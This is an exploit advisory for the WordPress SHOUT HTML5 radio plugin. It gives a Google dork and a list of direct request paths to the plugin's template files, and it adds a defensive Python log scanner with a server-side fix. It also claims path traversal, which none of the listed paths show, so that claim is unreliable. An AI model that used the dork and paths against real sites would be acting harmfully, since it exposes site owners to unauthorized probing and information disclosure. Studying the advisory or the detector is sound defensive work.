KingSkrupellos

WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x Info Exp

Jan 14th, 2019
########################################################################################

# Exploit Title : WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link : codecanyon.net/item/shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin/20667135
# Software Price : $21
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : From 3.0 To 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
#                      CWE-538 [ File and Directory Information Exposure ]
#                      CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

########################################################################################

WordPress Plugin - SHOUT - HTML5 Radio Player With Ads - ShoutCast and IceCast Support

########################################################################################

# Impact :
***********

* WordPress lbg-audio8-html5-radio_ads 4.9.x and other affected versions are prone to an arbitrary file disclosure vulnerability because the plugin fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in launching further attacks.

* An information exposure (CWE-200) is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere (CWE-538).

* The software uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but it does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside of the restricted directory (CWE-22).

########################################################################################

# Exploit :
*************

Plugin template files reachable by direct request under the web root:

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Playlist
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/banners.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/categories.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/help.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Add_New
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/players.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/playlist.php
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/preview.html
/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php
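As an added example (not part of the original advisory), the following Python script flags direct requests to the plugin's tpl/ templates in a combined-format web server access log, so a site owner can tell whether the paths above were ever hit; the sample log lines and IP addresses are constructed, and the one legitimate request routed through wp-admin/admin.php is deliberately left alone.

```python
import re
from urllib.parse import urlsplit, unquote

# Directory holding the plugin's admin templates (from the advisory). These files are
# meant to be included by WordPress from wp-admin, never requested directly by a browser.
PLUGIN_TPL_DIR = "/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/"

# Apache/nginx combined log format; the request target is the part we care about.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Constructed sample log (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jan/2019:10:01:02 +0000] "GET /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jan/2019:10:01:05 +0000] "GET /radio/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help HTTP/1.1" 200 988 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Jan/2019:10:02:11 +0000] "GET /wp-admin/admin.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jan/2019:10:03:00 +0000] "GET /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php HTTP/1.1" 403 199 "-" "curl/7.64.0"
"""

def classify(line):
    """Return a finding dict for a direct request to a plugin template, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)        # decode %2e / %2f etc. before matching
    idx = path.find(PLUGIN_TPL_DIR)   # find() so nested installs (/radio/wp-content/...) match too
    if idx < 0:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "file": path[idx + len(PLUGIN_TPL_DIR):],
        "query": parts.query,
        "status": status,
        # 200 means the server actually executed the template (and any PHP notices it emits)
        "served": status == 200,
    }

def scan(log_text):
    """Run classify() over every line; returns the findings in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {'SERVED' if f['served'] else 'blocked'} {f['file']} {f['query']}")
```

The server-side counterpart is the usual WordPress guard at the top of each template (`if ( ! defined( 'ABSPATH' ) ) exit;`) or a web server rule denying direct requests to the tpl/ directory, which turns the 200 responses above into 403s.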

########################################################################################

Video Tutorials =>
*******************

Installation - youtube.com/watch?v=km5cVH-iH_8
How To Use The Player - youtube.com/watch?v=DVLHNopEpXw
Manage The Banners - youtube.com/watch?v=i4CWseyJmLc

########################################################################################

# Example Vulnerable Sites :
*************************

########################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

########################################################################################